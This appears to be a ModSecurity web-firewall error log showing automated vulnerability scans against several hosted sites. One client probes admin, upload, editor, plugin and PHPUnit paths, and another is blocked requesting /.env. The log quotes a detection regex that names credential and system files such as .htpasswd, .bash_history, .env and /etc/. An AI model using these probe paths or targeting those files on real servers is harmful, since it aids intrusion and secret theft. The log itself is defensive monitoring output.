[Tue May 26 16:41:21.628994 2026] [security2:error] [pid 823496:tid 823690] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PCAwAAAD4"]
[Tue May 26 16:41:21.629023 2026] [security2:error] [pid 823496:tid 823690] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PCAwAAAD4"]
[Tue May 26 16:41:21.629405 2026] [security2:error] [pid 823496:tid 823679] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/admin/"] [unique_id "ahV_2Za08mrtyBNpA4PCAQAAADM"]
[Tue May 26 16:41:21.864736 2026] [security2:error] [pid 823496:tid 823644] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_15a08mrtyBNpA4PBxwAAABA"]
[Tue May 26 16:41:21.969197 2026] [security2:error] [pid 823496:tid 823689] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.srsglobalsoft.com"] [uri "/wp-admin/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PCBwAAAD0"]
[Tue May 26 16:41:22.590794 2026] [security2:error] [pid 823496:tid 823681] [client 89.117.104.6:48598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.104.117.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_2pa08mrtyBNpA4PCDAAAADU"]
[Tue May 26 16:41:22.591001 2026] [security2:error] [pid 823496:tid 823681] [client 89.117.104.6:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahV_2pa08mrtyBNpA4PCDAAAADU"]
[Tue May 26 16:41:23.407263 2026] [security2:error] [pid 823496:tid 823746] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_25a08mrtyBNpA4PCGQAAAHY"]
[Tue May 26 16:41:23.407301 2026] [security2:error] [pid 823496:tid 823746] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_25a08mrtyBNpA4PCGQAAAHY"]
[Tue May 26 16:41:23.407806 2026] [security2:error] [pid 817651:tid 817890] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/images/"] [unique_id "ahV_29lGRCPPN1dS2y2psQAAAPI"]
[Tue May 26 16:41:23.837684 2026] [security2:error] [pid 823496:tid 823724] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_25a08mrtyBNpA4PCJAAAAGA"]
[Tue May 26 16:41:23.837715 2026] [security2:error] [pid 823496:tid 823724] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_25a08mrtyBNpA4PCJAAAAGA"]
[Tue May 26 16:41:23.838219 2026] [security2:error] [pid 817651:tid 817824] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/assets/"] [unique_id "ahV_29lGRCPPN1dS2y2pugAAALA"]
[Tue May 26 16:41:23.909116 2026] [security2:error] [pid 823496:tid 823705] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_2Za08mrtyBNpA4PB_QAAAE0"]
[Tue May 26 16:41:24.141896 2026] [security2:error] [pid 823496:tid 823664] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Ja08mrtyBNpA4PCKQAAACQ"]
[Tue May 26 16:41:24.141944 2026] [security2:error] [pid 823496:tid 823664] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Ja08mrtyBNpA4PCKQAAACQ"]
[Tue May 26 16:41:24.142583 2026] [security2:error] [pid 817651:tid 817806] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/"] [unique_id "ahV_3NlGRCPPN1dS2y2pvQAAAJ4"]
[Tue May 26 16:41:24.425982 2026] [security2:error] [pid 817651:tid 817903] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pwgAAAP8"]
[Tue May 26 16:41:24.426003 2026] [security2:error] [pid 817651:tid 817903] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pwgAAAP8"]
[Tue May 26 16:41:24.426644 2026] [security2:error] [pid 817651:tid 817782] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/upload/image/"] [unique_id "ahV_3NlGRCPPN1dS2y2pwAAAAIY"]
[Tue May 26 16:41:24.673844 2026] [security2:error] [pid 817651:tid 817902] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pyAAAAP4"]
[Tue May 26 16:41:24.673891 2026] [security2:error] [pid 817651:tid 817902] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pyAAAAP4"]
[Tue May 26 16:41:24.674426 2026] [security2:error] [pid 817651:tid 817786] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/assets/images/"] [unique_id "ahV_3NlGRCPPN1dS2y2pxgAAAIo"]
[Tue May 26 16:41:24.946976 2026] [security2:error] [pid 817651:tid 817799] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pywAAAJc"]
[Tue May 26 16:41:24.947010 2026] [security2:error] [pid 817651:tid 817799] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3NlGRCPPN1dS2y2pywAAAJc"]
[Tue May 26 16:41:24.947585 2026] [security2:error] [pid 817651:tid 817880] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/Public/"] [unique_id "ahV_3NlGRCPPN1dS2y2pygAAAOg"]
[Tue May 26 16:41:25.223054 2026] [security2:error] [pid 823496:tid 823707] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCOAAAAE8"]
[Tue May 26 16:41:25.223092 2026] [security2:error] [pid 823496:tid 823707] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCOAAAAE8"]
[Tue May 26 16:41:25.223647 2026] [security2:error] [pid 817651:tid 817898] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/vendor/"] [unique_id "ahV_3dlGRCPPN1dS2y2pzQAAAPo"]
[Tue May 26 16:41:25.455596 2026] [security2:error] [pid 823496:tid 823630] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCPAAAAAI"]
[Tue May 26 16:41:25.455638 2026] [security2:error] [pid 823496:tid 823630] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCPAAAAAI"]
[Tue May 26 16:41:25.456243 2026] [security2:error] [pid 817651:tid 817837] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/local/"] [unique_id "ahV_3dlGRCPPN1dS2y2pzgAAAL0"]
[Tue May 26 16:41:25.734355 2026] [security2:error] [pid 823496:tid 823713] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCPgAAAFU"]
[Tue May 26 16:41:25.734445 2026] [security2:error] [pid 823496:tid 823713] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCPgAAAFU"]
[Tue May 26 16:41:25.734813 2026] [security2:error] [pid 817651:tid 817818] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/modules/"] [unique_id "ahV_3dlGRCPPN1dS2y2p0AAAAKo"]
[Tue May 26 16:41:25.974973 2026] [security2:error] [pid 823496:tid 823712] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCQwAAAFQ"]
[Tue May 26 16:41:25.975003 2026] [security2:error] [pid 823496:tid 823712] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3Za08mrtyBNpA4PCQwAAAFQ"]
[Tue May 26 16:41:25.975650 2026] [security2:error] [pid 817651:tid 817822] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/Site/"] [unique_id "ahV_3dlGRCPPN1dS2y2p1AAAAK4"]
[Tue May 26 16:41:26.217611 2026] [security2:error] [pid 817651:tid 817796] [client 176.65.139.231:52658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "demo.sbvschools.com"] [uri "/.env"] [unique_id "ahV_3tlGRCPPN1dS2y2p1gAAAJQ"]
[Tue May 26 16:41:26.256353 2026] [security2:error] [pid 823496:tid 823736] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3pa08mrtyBNpA4PCSAAAAGw"]
[Tue May 26 16:41:26.256388 2026] [security2:error] [pid 823496:tid 823736] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3pa08mrtyBNpA4PCSAAAAGw"]
[Tue May 26 16:41:26.258901 2026] [security2:error] [pid 817651:tid 817784] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/system/"] [unique_id "ahV_3tlGRCPPN1dS2y2p1QAAAIg"]
[Tue May 26 16:41:26.530178 2026] [security2:error] [pid 823496:tid 823752] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3pa08mrtyBNpA4PCUQAAAHw"]
[Tue May 26 16:41:26.530204 2026] [security2:error] [pid 823496:tid 823752] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3pa08mrtyBNpA4PCUQAAAHw"]
[Tue May 26 16:41:26.530762 2026] [security2:error] [pid 817651:tid 817885] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/template/"] [unique_id "ahV_3tlGRCPPN1dS2y2p1wAAAO0"]
[Tue May 26 16:41:26.855253 2026] [security2:error] [pid 817651:tid 817861] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3tlGRCPPN1dS2y2p2wAAANU"]
[Tue May 26 16:41:26.855293 2026] [security2:error] [pid 817651:tid 817861] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_3tlGRCPPN1dS2y2p2wAAANU"]
[Tue May 26 16:41:26.855740 2026] [security2:error] [pid 817651:tid 817845] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/shop/"] [unique_id "ahV_3tlGRCPPN1dS2y2p2gAAAMU"]
[Tue May 26 16:41:27.156822 2026] [security2:error] [pid 817651:tid 817890] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p5gAAAPI"]
[Tue May 26 16:41:27.156853 2026] [security2:error] [pid 817651:tid 817890] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p5gAAAPI"]
[Tue May 26 16:41:27.157467 2026] [security2:error] [pid 817651:tid 817891] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/files/"] [unique_id "ahV_39lGRCPPN1dS2y2p5AAAAPM"]
[Tue May 26 16:41:27.435735 2026] [security2:error] [pid 817651:tid 817857] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p6QAAANE"]
[Tue May 26 16:41:27.435761 2026] [security2:error] [pid 817651:tid 817857] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p6QAAANE"]
[Tue May 26 16:41:27.436321 2026] [security2:error] [pid 817651:tid 817824] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/admin/editor/"] [unique_id "ahV_39lGRCPPN1dS2y2p5wAAALA"]
[Tue May 26 16:41:27.662188 2026] [security2:error] [pid 817651:tid 817903] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p9QAAAP8"]
[Tue May 26 16:41:27.662212 2026] [security2:error] [pid 817651:tid 817903] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p9QAAAP8"]
[Tue May 26 16:41:27.662709 2026] [security2:error] [pid 817651:tid 817897] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/include/"] [unique_id "ahV_39lGRCPPN1dS2y2p8wAAAPk"]
[Tue May 26 16:41:27.941882 2026] [security2:error] [pid 817651:tid 817887] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p-gAAAO8"]
[Tue May 26 16:41:27.941917 2026] [security2:error] [pid 817651:tid 817887] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_39lGRCPPN1dS2y2p-gAAAO8"]
[Tue May 26 16:41:27.951143 2026] [security2:error] [pid 817651:tid 817828] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/Assets/"] [unique_id "ahV_39lGRCPPN1dS2y2p-AAAALQ"]
[Tue May 26 16:41:28.025149 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV_25a08mrtyBNpA4PCIQAAABo"]
[Tue May 26 16:41:28.283438 2026] [security2:error] [pid 817651:tid 817823] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4NlGRCPPN1dS2y2p_QAAAK8"]
[Tue May 26 16:41:28.283466 2026] [security2:error] [pid 817651:tid 817823] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4NlGRCPPN1dS2y2p_QAAAK8"]
[Tue May 26 16:41:28.286418 2026] [security2:error] [pid 817651:tid 817869] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/images/stories/"] [unique_id "ahV_4NlGRCPPN1dS2y2p-wAAAN0"]
[Tue May 26 16:41:28.547070 2026] [security2:error] [pid 823496:tid 823679] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4Ja08mrtyBNpA4PCbAAAADM"]
[Tue May 26 16:41:28.547093 2026] [security2:error] [pid 823496:tid 823679] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4Ja08mrtyBNpA4PCbAAAADM"]
[Tue May 26 16:41:28.547682 2026] [security2:error] [pid 817651:tid 817783] [client 89.117.104.6:37346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/plugins/"] [unique_id "ahV_4NlGRCPPN1dS2y2qAQAAAIc"]
[Tue May 26 16:41:28.830379 2026] [security2:error] [pid 817651:tid 817838] [client 89.117.104.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4NlGRCPPN1dS2y2qCwAAAL4"]
[Tue May 26 16:41:28.830415 2026] [security2:error] [pid 817651:tid 817838] [client 89.117.104.6:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahV_4NlGRCPPN1dS2y2qCwAAAL4"]
